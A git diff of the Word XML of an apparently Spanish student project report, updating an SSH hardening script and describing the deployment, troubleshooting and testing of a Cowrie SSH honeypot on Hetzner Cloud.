+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  # para poder volver a ejecutar el script sin repetir este paso.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  if [[ "$(passwd -S "$ADMIN_USER" | awk '{print $2}')" != "P" ]]; then</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    echo "  Elige la contrasena de $ADMIN_USER. Solo la pedira sudo: el SSH seguira siendo solo con clave."</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    passwd "$ADMIN_USER"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  fi</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">fi</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
         <w:t xml:space="preserve">[[ -s "/home/$ADMIN_USER/.ssh/authorized_keys" ]] \</w:t>
       </w:r>
     </w:p>
@@ -28903,6 +29757,22 @@
           <w:sz w:val="16"/>
           <w:szCs w:val="16"/>
         </w:rPr>
+        <w:t xml:space="preserve">info "Usuario administrador: $ADMIN_USER"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
@@ -28951,39 +29821,71 @@
           <w:sz w:val="16"/>
           <w:szCs w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve">  ANTES DE CONTINUAR, en la consola de Oracle Cloud:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:keepLines/>
-        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
-        <w:spacing w:after="0" w:before="0" w:line="240"/>
-        <w:ind w:left="170" w:right="170"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
-          <w:sz w:val="16"/>
-          <w:szCs w:val="16"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    Networking &gt; VCN &gt; Subnet publica &gt; Security List &gt; Add Ingress Rule</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:keepLines/>
-        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
-        <w:spacing w:after="0" w:before="0" w:line="240"/>
-        <w:ind w:left="170" w:right="170"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
-          <w:sz w:val="16"/>
-          <w:szCs w:val="16"/>
-        </w:rPr>
-        <w:t xml:space="preserve">      Source CIDR 0.0.0.0/0 - TCP - Destination port $SSH_PORT</w:t>
+        <w:t xml:space="preserve">  ANTES DE CONTINUAR, en el firewall de tu proveedor cloud abre la</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  entrada TCP $SSH_PORT desde cualquier origen (0.0.0.0/0):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    - Hetzner: Firewalls &gt; (tu firewall) &gt; Reglas de entrada</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    - Oracle:  Networking &gt; VCN &gt; Subnet &gt; Security List &gt; Ingress Rule</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    - AWS:     EC2 &gt; Security Groups &gt; Inbound rules</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -29047,7 +29949,7 @@
           <w:sz w:val="16"/>
           <w:szCs w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve">read -rp "  El puerto $SSH_PORT ya esta abierto en la Security List? (si/no): " ok</w:t>
+        <w:t xml:space="preserve">read -rp "  El puerto $SSH_PORT ya esta abierto en el firewall del proveedor? (si/no): " ok</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -29607,7 +30509,7 @@
           <w:sz w:val="16"/>
           <w:szCs w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve"># Si la cadena INPUT no tiene ya un "denegar todo" (imagen no Oracle),</w:t>
+        <w:t xml:space="preserve"># Si la cadena INPUT no tiene ya un "denegar todo" (p. ej. Hetzner o AWS),</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -29911,6 +30813,54 @@
           <w:sz w:val="16"/>
           <w:szCs w:val="16"/>
         </w:rPr>
+        <w:t xml:space="preserve"># Ubuntu 24.04 arranca sshd por socket y /run/sshd solo existe mientras el</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># servicio corre; "sshd -t" falla sin ella aunque la configuracion este bien.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">install -d -m 0755 /run/sshd</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
         <w:t xml:space="preserve">if ! sshd -t; then</w:t>
       </w:r>
     </w:p>
@@ -30306,6 +31256,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -31485,7 +32436,23 @@
           <w:sz w:val="16"/>
           <w:szCs w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve">if [[ "$(uname -m)" == "aarch64" ]] &amp;&amp; (( mem_mb &gt;= 2048 )); then</w:t>
+        <w:t xml:space="preserve">es_oci=$(cat /sys/class/dmi/id/chassis_asset_tag 2&gt;/dev/null || true)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">if [[ "$es_oci" == "OracleCloud.com" &amp;&amp; "$(uname -m)" == "aarch64" ]] &amp;&amp; (( mem_mb &gt;= 2048 )); then</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -31677,7 +32644,7 @@
           <w:sz w:val="16"/>
           <w:szCs w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve">  info "No es una A1 con 2 GB o mas: la reserva de memoria no hace falta."</w:t>
+        <w:t xml:space="preserve">  info "No es una instancia A1 de Oracle: la reserva de memoria no hace falta."</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -31757,7 +32724,7 @@
           <w:sz w:val="16"/>
           <w:szCs w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve">    1. En la Security List de OCI abre TEMPORALMENTE el 2222/TCP</w:t>
+        <w:t xml:space="preserve">    1. En el firewall del proveedor abre TEMPORALMENTE el 2222/TCP</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -31837,7 +32804,7 @@
           <w:sz w:val="16"/>
           <w:szCs w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve">    4. Cierra el 2222 en la Security List y continua con:</w:t>
+        <w:t xml:space="preserve">    4. Cierra el 2222 en el firewall del proveedor y continua con:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -31896,6 +32863,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
       </w:pPr>
@@ -32387,7 +33355,7 @@
           <w:sz w:val="16"/>
           <w:szCs w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve"># firewall del host debe aceptar el 2222 aunque OCI solo exponga el 22.</w:t>
+        <w:t xml:space="preserve"># firewall del host debe aceptar el 2222 aunque el proveedor solo exponga el 22.</w:t>
       </w:r>
     </w:p>
     <w:p>

--- a/docs/Memoria_PIASIR_Diego_Perez_Fonterosa.docx
+++ b/docs/Memoria_PIASIR_Diego_Perez_Fonterosa.docx
@@ -13312,7 +13312,7 @@
                 <w:sz w:val="20"/>
                 <w:szCs w:val="20"/>
               </w:rPr>
-              <w:t xml:space="preserve">Pendiente</w:t>
+              <w:t xml:space="preserve">Completada</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -13419,7 +13419,7 @@
                 <w:sz w:val="20"/>
                 <w:szCs w:val="20"/>
               </w:rPr>
-              <w:t xml:space="preserve">Pendiente</w:t>
+              <w:t xml:space="preserve">En curso</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -23261,7 +23261,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">El 4 de octubre de 2026 se creó el servidor en Hetzner Cloud y se ejecutó el script de bastionado. El despliegue real sacó a la luz dos incidencias que las pruebas locales no podían detectar, porque dependen del sistema real del proveedor.</w:t>
+        <w:t xml:space="preserve">El 4 de octubre de 2026 se creó el servidor en Hetzner Cloud y se ejecutó el script de bastionado. Ese mismo día se instaló Cowrie y se activó la redirección del puerto 22, con lo que comenzó la captura. El despliegue real sacó a la luz tres incidencias que las pruebas locales no detectaron: dos dependían del sistema del proveedor y la tercera, del entorno en que systemd ejecuta los servicios.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23378,7 +23378,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Resultados del Bastionado</w:t>
+        <w:t xml:space="preserve">Incidencia: Cowrie no Arrancaba como Servicio</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23397,25 +23397,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Tras la segunda ejecución del script, el usuario diego accede por el puerto 2022 con la clave dedicada. Al instalar iptables-persistent, el sistema desinstaló automáticamente UFW, que venía instalado pero inactivo en la imagen de Hetzner, lo que confirma la incompatibilidad entre ambas herramientas comentada en el capítulo de Tecnología.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:keepNext/>
-        <w:spacing w:after="240" w:before="240" w:line="360"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Pruebas Pendientes en el Servidor</w:t>
+        <w:t xml:space="preserve">El script de instalación terminó con el mensaje «Cowrie no arranca», gracias a la comprobación final que verifica que el servicio está activo y escucha en el puerto 2222. El registro del servicio mostraba un FileNotFoundError: el programa cowrie start lanza a su vez twistd buscándolo en el PATH, y systemd no activa el entorno virtual de Python donde está instalado. En las pruebas locales no apareció porque Cowrie se arrancaba con el entorno virtual ya activado.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23434,7 +23416,104 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Las siguientes pruebas de la tabla RFTP se documentarán, con sus capturas, a medida que avance el despliegue:</w:t>
+        <w:t xml:space="preserve">Corregido el PATH, apareció un segundo fallo que el primero ocultaba: en primer plano, twistd escribe por defecto un fichero twistd.pid en el directorio de trabajo, y el confinamiento del servicio (ProtectHome=read-only) deja ese directorio en solo lectura. Ambos fallos se reprodujeron en local con Cowrie 3.1.0 antes de corregirlos. La solución fue que el servicio ejecute directamente twistd con su ruta completa y la opción --pidfile= vacía, ya que systemd conoce el PID del proceso y el fichero no aporta nada. Así se mantuvo intacto el confinamiento, en lugar de relajarlo para que el servicio arrancase.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">La incidencia confirma el valor de que los scripts comprueben el resultado y no solo ejecuten pasos: sin esa comprobación, la instalación habría parecido correcta y el honeypot habría expuesto un puerto sin servicio.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:keepNext/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Resultados del Bastionado</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Tras la segunda ejecución del script, el usuario diego accede por el puerto 2022 con la clave dedicada. Al instalar iptables-persistent, el sistema desinstaló automáticamente UFW, que venía instalado pero inactivo en la imagen de Hetzner, lo que confirma la incompatibilidad entre ambas herramientas comentada en el capítulo de Tecnología.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:keepNext/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Resultados de la Instalación de Cowrie y la Exposición</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Las pruebas realizadas en el servidor el 4 de octubre, todas con captura de pantalla, fueron las siguientes:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23453,7 +23532,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Rechazo del acceso SSH como root y con contraseña en el puerto 2022 (R01F02).</w:t>
+        <w:t xml:space="preserve">El acceso SSH como root al puerto 2022 es rechazado (R01F02).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23472,7 +23551,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Persistencia de las reglas de iptables y del SSH en el 2022 tras un reinicio del servidor.</w:t>
+        <w:t xml:space="preserve">Tras reiniciar el servidor, las reglas de iptables se mantienen y el SSH real solo escucha en el puerto 2022.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23491,7 +23570,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Escaneo con nmap desde el exterior: solo los puertos 22 y 2022 visibles (R01F02T01P01).</w:t>
+        <w:t xml:space="preserve">Prueba local de Cowrie en el puerto 2222: la contraseña root es rechazada, la contraseña prueba da acceso con la identidad web-prod-02, y los intentos y comandos quedan registrados en cowrie.json.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23510,7 +23589,63 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Conexión al puerto 22 que aterriza en Cowrie con la identidad web-prod-02 (R02F01T03P01).</w:t>
+        <w:t xml:space="preserve">Prueba externa desde el equipo del administrador: la conexión al puerto 22 aterriza en Cowrie con la identidad web-prod-02, y el registro en directo muestra el login y los comandos con la IP pública de origen (R02F01T03P01).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Las sesiones de prueba quedan en el registro junto con los ataques reales. Para que no alteren las estadísticas, el analizador excluye siempre las conexiones desde localhost y admite la opción --exclude-ip para descartar la IP pública del administrador.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Pruebas Pendientes en el Servidor</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Las siguientes pruebas de la tabla RFTP se documentarán, con sus capturas, a medida que avance el proyecto:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23529,63 +23664,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Ataque controlado desde Kali Linux con hydra y verificación en cowrie.json (CU-03).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-        <w:keepNext/>
-        <w:pageBreakBefore/>
-        <w:spacing w:after="240" w:before="240" w:line="360"/>
-        <w:jc w:val="center"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Trabajos Futuros</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360"/>
-        <w:ind w:firstLine="709"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:i w:val="false"/>
-          <w:iCs w:val="false"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">El proyecto sienta las bases para diversas líneas de ampliación y mejora que podrían desarrollarse como continuación de este trabajo, como proyecto de Máster o como implementación profesional en un entorno corporativo.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:keepNext/>
-        <w:spacing w:after="240" w:before="240" w:line="360"/>
-        <w:jc w:val="left"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Evolución del Honeypot</w:t>
+        <w:t xml:space="preserve">Escaneo con nmap desde el exterior: solo los puertos 22 y 2022 visibles (R01F02T01P01).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23601,20 +23680,66 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ataque controlado desde Kali Linux con hydra y verificación en cowrie.json (CU-03).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:keepNext/>
+        <w:pageBreakBefore/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
           <w:b/>
           <w:bCs/>
